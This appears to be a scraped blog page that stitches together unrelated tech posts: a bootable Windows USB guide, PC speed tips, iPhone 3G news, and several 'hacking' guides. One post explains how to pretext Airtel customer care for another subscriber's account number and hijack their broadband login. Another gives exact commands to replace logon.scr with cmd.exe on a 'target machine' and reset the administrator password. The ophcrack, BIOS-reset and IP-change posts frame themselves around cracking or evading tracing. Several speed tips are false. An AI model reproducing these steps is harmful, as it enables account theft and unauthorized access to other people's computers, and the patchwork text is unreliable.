Creating Bootable Vista / Windows 7 USB Flash Drive

It surprised me to find that there are very few dead-simple guides to creating a bootable USB thumb/pen/flash drive for a Vista and/or Windows 7 installation. I cobbled together the following from VistaPCGuy and another source I don’t remember right now.
This will walk through the steps to create a bootable USB flash drive for the purpose of installing a Vista or Windows 7 OS. These instructions assume that you have a computer with Windows Vista installed on it.

Required:

USB Flash Drive (4GB+)
Microsoft OS Disk (Vista / Windows 7)
A computer running Vista / Windows 7

Step 1: Format the Drive
The steps here are to use the command line to format the disk properly using the diskpart utility. [Be warned: this will erase everything on your drive. Be careful.]

Plug in your USB Flash Drive
Open a command prompt as administrator (Right click on Start > All Programs > Accessories > Command Prompt and select “Run as administrator”
Find the drive number of your USB Drive by typing the following into the Command Prompt window:
diskpart
list disk
The number of your USB drive will listed. You’ll need this for the next step. I’ll assume that the USB flash drive is disk 1.
Format the drive by typing the next instructions into the same window. Replace the number “1” with the number of your disk below.
select disk 1
clean
create partition primary
select partition 1
active
format fs=NTFS
assign
exit
When that is done you’ll have a formatted USB flash drive ready to be made bootable.

Step 2: Make the Drive Bootable
Next we’ll use the bootsect utility that comes on the Vista or Windows 7 disk to make the flash drive bootable. In the same command window that you were using in Step 1:

Insert your Windows Vista / 7 DVD into your drive.
Change directory to the DVD’s boot directory where bootsect lives:
d:
cd d:\boot
Use bootsect to set the USB as a bootable NTFS drive prepared for a Vista/7 image. I’m assuming that your USB flash drive has been labeled disk G:\ by the computer:
bootsect /nt60 g:
You can now close the command prompt window, we’re done here.

Step 3: Copy the installation DVD to the USB drive
The easiest way is to use Windows explorer to copy all of the files on your DVD on to the formatted flash drive. After you’ve copied all of the files the disk you are ready to go.
Step 4: Set your BIOS to boot from USB
This is where you’re on your own since every computer is different. Most BIOS’s allow you to hit a key at boot and select a boot option.
I used these instructions to get my new Dell Mini 9 laptop loaded with Windows 7 (the PDC bits). HTH.

Requirements :
1) An Airtel broadband connection.
2) Any Airtel phone number with high broadband speed : Yes, you need a phone number of Airtel with high broadband speed like 256 kbps. Airtel connection is so common that any of your friend or neighbour might be using it. Just ask for their phone number and save it. As an example, I am assuming a number 1234567

Step1) Now comes the tricky part : Just call 197 from your Airtel landline phone and ask for the following details of the number 1234567.

>> Name of the owner of this number.
>> Address of the owner of this number.

Step 2) That's it. Now note down the 2 details mentioned above.

Step 3) Now call customer care ( 4444121) from Airtel landline and tell them that I need the Account Number and give them the phone number you have e.x 1234567

He/she will ask you for the account details and tell them exactly what you noted in Step 2.

Note : Airtel by default sets the username as Phone Number and password as Account Number.
Now you have phone number and account number of a person that has a high broadband Airtel connection.

Now I am going to tell you that what to do with the phone number and account number.

Step 4) Open Internet Explorer or Mozilla Firefox and in the address bar enter the following address and hit enter.

192.168.1.1

When you will press enter a Window will pop up asking for User Name and Password.

Step 5) In the user name and password field enter the details below :

User Name : admin
Password : password

DSL Router will open and we have to make some changes in the Modem settings.

Step 6) In the left sidebar click on WAN and a new page will open and click on EDIT.

Have a look :

Click on Edit and keep on clicking Next until you get this screen :

Now in the PPP Username and PPP Password enter the following :

PPP Username : 0401234567@_dsl@airtelbroadband.in ( Here is 040 is my State Code and 1234567 is the phone number is assumed but in your case both will be different. )
PPP Password : enter the account number that your noted in Step 2

After entering these keep on clicking Next and at last click on Save and then Save and Reboot.

Now reboot your system and check your Internet speed here.

Congrats now you have high Internet Speed connection.

How to hack windows XP admin password

If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user password"

If the Administrator Account is called Frank and you want the password blah enter this

"net user Frank blah"

and this changes the password on franks machine to blah and your in.

To enable automatic logon, follow these steps:
1. Start Regedt32.exe, and then locate the following registry subkey:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
2. Using your account name and password, double-click the DefaultUserName entry, type your user name, and then click OK.
3. Double-click the DefaultDomainName entry, type the domain name, and then click OK.
4. Double-click the DefaultPassword entry, type your password, and then click OK.

Note If the DefaultPassword value does not exist, follow these steps:
a. Click Add Value on the Edit menu.
b. In the Value Name box, type DefaultPassword, and then click REG_SZ for the Data Type
c. Type your password in the String box, and then save your changes.
Also, if no DefaultPassword string is specified, Windows automatically changes the value of the AutoAdminLogon key from 1 (true) to 0 (false), which disables the AutoAdminLogon feature.
5. Click Add Value on the Edit menu, enter AutoAdminLogon in the Value Name box, and then click REG_SZ for the Data Type.
6. Type 1 in the String box, and then save your changes.
7. Quit Regedt32.
8. Click Start, click Shutdown, and then click OK to turn off your computer.
9. Restart your computer and Windows. You are now able to log on automatically.
NOTE: To bypass the AutoAdminLogon process, and to log on as a different user, hold down the SHIFT key after you log off or after Windows restarts.

Go to http://ophcrack.sourceforge.net and download the ophcracklivecd iso that is offered there (~455 MB).
Burn the iso file to CD using an image burning software.
Put the CD in the disc drive of the computer you want to crack the passwords of.
Boot from disc. This shouldn't be to hard. Depending on computer, enter the bios settings and change the boot settings to boot from a disc drive on first boot device.
Exit BIOS setting.
Ophcrack will initiate by itself.
The logo screen should appear, at which you should hit enter. Text should scroll down the screen, and eventually you will have a graphical interface pop up, with the one and only window (Ophcrack).
Once the system is done, select the user account you wish to recover the password for, and click launch.
Depending on the speed of your system, the cracker will go to work, and if it can determine and decrypt your password, it will eventually display it in the "NTPassword" column

How to Break a BIOS Password ?

1. Power off the computer and make sure that it is unplugged.
2. Open up your computer case. You need physical access to the motherboard to complete this procedure.
3.
Find a circular, (mostly) silver metallic object on the motherboard. This is the CMOS battery.
4. CAREFULLY remove the CMOS battery and leave it out for about 120 seconds. This will flush the CMOS memory which stores the BIOS password and all other configuration. (See Warnings)
5. Set the battery back into place and power on the computer.
6. The computer should then warn you that the CMOS configuration could not be found. You can either reconfigure it yourself or restore defaults. Restoring the default configuration should be fine.
7. You will notice that the BIOS password has been cleared and you can boot without it. You may reset the BIOS password to something else by going into the BIOS configuration and setting a new User Password (The Supervisor Password controls access to the BIOS, NOT the computer!)

Top Ten Tips To Improve System Speed

1.Let your PC boot up completely before opening any applications.

2.Refresh the desktop after closing any application. This will remove any unused files from the RAM.

3.Do not set very large file size images as your wallpaper. Do not keep a wallpaper at all if your PC is low on RAM (less than 64 MB).

4.Do not clutter your Desktop with a lot of shortcuts. Each shortcut on the desktop uses up to 500 bytes of RAM

5.Empty the recycle bin regularly. The files are not really deleted from your hard drive until you empty the recycle bin.

6.Delete the temporary internet files regularly.

7.Defragment your hard drive once every two months. This will free up a lot of space on your hard drive and rearrange the files so that your applications run faster.

8.Always make two partitions in your hard drive. Install all large Softwares (like PSP, Photoshop, 3DS Max etc) in the second partition. Windows uses all the available empty space in C drive as virtual memory when your Computer RAM is full. Keep the C Drive as empty as possible.

9.When installing new Softwares disable the option of having a tray icon. The tray icons use up available RAM, and also slow down the booting of your PC. Also disable the option of starting the application automatically when the PC boots. You can disable these options later on also from the Tools or preferences menu in your application.

10. Protect your PC from dust. Dust causes the CPU cooling fan to jam and slow down thereby gradually heating your CPU and affecting the processing speed. Use compressed air to blow out any dust from the CPU. Never use vacuum.

How To: Change Your Ip In Less Then 1 Minute & This tool also good for rapidshare time limit..

1. Click on "Start" in the bottom left hand corner of screen
2. Click on "Run"
3. Type in "command" and hit ok
You should now be at an MSDOS prompt screen.
4. Type "ipconfig /release" just like that, and hit "enter"
5. Type "exit" and leave the prompt
6. Right-click on "Network Places" or "My Network Places" on your desktop.
7. Click on "properties"
You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks.
8. Right click on "Local Area Connection" and click "properties"
9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab
10. Click on "Use the following IP address" under the "General" tab
11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up).
12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers.
13. Hit the "Ok" button here
14. Hit the "Ok" button again
You should now be back to the "Local Area Connection" screen.
15. Right-click back on "Local Area Connection" and go to properties again.
16. Go back to the "TCP/IP" settings
17. This time, select "Obtain an IP address automatically"

18. Hit "Ok"
19. Hit "Ok" again
20. You now have a new IP address
With a little practice, you can easily get this process down to 15 seconds.
P.S:
This only changes your dynamic IP address, not your ISP/IP address. If you plan on hacking a website with this trick be extremely careful, because if they try a little, they can trace it back

Apple event predicted Feb 26th to launch 3G iPhone & SDK

Only days after Apple announced the iPhone's storage increase - doubling from 8GB to 16GB - rumors are now spreading that the company is planning an event on February 26th at which the iPhone SDK will be launched and, potentially, the 3G version of the handset be revealed. The speculation began after Mira Mobile, the company that Apple contracts their keynote video recording to, began hiring for a large & unspecified event during the last week of February; this would fit in with Apple's own timescale for the SDK software release, which it promised would be "in developers hands" by this month.

Rumors regarding the 3G iPhone have been fuelled by AT&T's rapid push to spread 3G connectivity across the US; CEO Randall Stephenson confirmed a 3G version would be launched sometime this year. While it would seem unusual to announce a high-speed version of the Apple cellphone so soon after the storage upgrade, less than predicted sales of the iPhone in European markets may be forcing Apple's hand.

The original Apple iPhone was a love it or hate it device - and incredibly slick and stylish handset, but one with a number of serious flaws. The replacement iPhone has been rumoured for months and finally we can see what Apple have kept very secret - the new Apple iPhone 3G. Billed as "Twice as fast. Half the price", the iPhone certainly addresses two of the key concerns of the original - that it was expensive and slow.

Looking quite similar to the original iPhone, the iPhone 3G has a slightly curved back and a number of cosmetic improvements. As well as being available in black, the iPhone 3G will be available in a more traditional white colour, but of course the main differences are under the hood. (See more pictures in the Gallery)

Obviously, the iPhone 3G supports 3G. But it's also an HSDPA phone, which makes it 3.5G. In addition, the iPhone 3G's tri-band UMTS support, plus quad-band GSM, GPRS and EDGE data means that the iPhone 3G should be able to give high-speed data access pretty much anywhere in the world.

Another new feature is GPS - the iPhone 3G uses Advanced GPS to get quicker "fix" times. We've seen this before on many other devices, notably the Nokia N95 8GB. There's a mapping application bundled with the device, although we suspect that full blown satellite navigation may cost more.

Apple claim to have fixed on other annoying feature on the original iPhone - battery life. The iPhone 3G has up to 10 hours talktime on GSM, with a maximum of 5 hours talktime on 3G. Web browsing time on 3G is slated at around 5 to 6 hours. Standby time is around 12 days.Enough of the good stuff - there are some things that Apple haven't fixed. Firstly, the camera is still a 2 megapixel unit , as found in the old iPhone (although it does support geotagging). We would have hoped for 5 megapixels or better. The battery is still not user-removable, so a new battery involves a trip to an Apple service centre. The iPhone 3G doesn't have video calling, which is pretty standard on most 3G phones. Finally, the screen is still a 320 x 480 pixel panel when we would have hoped for a VGA or higher resolution display (as in the HTC Touch Diamond).

Of course, the Apple iPhone 3G still supports WiFi, Bluetooth. As with the original iPhone, the iPhone 3G's memory is not expandable.. but the 8GB or 16GB included should be plenty.

The Apple iPhone 3G's launch date is 11th July, and Apple intend to eventually roll out the iPhone 3G in 70 countries. The 8GB model will cost $199, the 16GB model will be $299. Those prices only apply to the US and other countries will have different pricing structures. The full release schedule is here.

It's more than just hardware, Apple are promoting the fact that the iPhone 3G's new "iPhone 2.0" platform will have more applications, and it will also feature their "mobileme" service which includes an intelligent push email service, aimed in particular at those people who either work in small businesses or are personal users. Mobileme will also integrate with PC and Mac based calendering and email tools, and will cost US users $99 a year, and it replaces the existing .Mac service. Software for the new "iPhone 2.0" platform includes blogging tools, an eBay assistant, games and more serious applications such as those aimed at medical practitioners. Apple's point is this: the new iPhone is more than hardware, it's also about the software and services that have been designed to run on it.

While the Apple iPhone 3G is certainly a much better device than the original iPhone, a lot of flaws still exist. Many of Apple's competitors will be breathing a sigh of relief that the iPhone 3G is certainly not as good as it should be. Still, we think that it will sell well and even the hardest of cynics were impressed by the original iPhone when they get their hands on one.

The 16GB iPhone will be available for free to those signed up to the £75 per month tariff, or will cost £159 for those customers on the £30 and £35 contracts, and cost £59 on the £45 per month tariff.

The iPhone will also be available as a pay-as-you-go handset, although O2 is yet to announce pricing details for the device on this tariff.

Users of the new iPhone 3G will continue to have unlimited data browsing over the 3G network, as well as free access to the internet in BT Openzone and The Cloud wireless hotspots.

The next-generation iPhone 3G was unveiled yesterday at Apple's annual Worldwide Developers Conference in San Francisco.

Steve Jobs, Apple's CEO, called the device "the phone that has changed phones forever". The new-look handset is thinner than its predecessor and features built-in GPS.
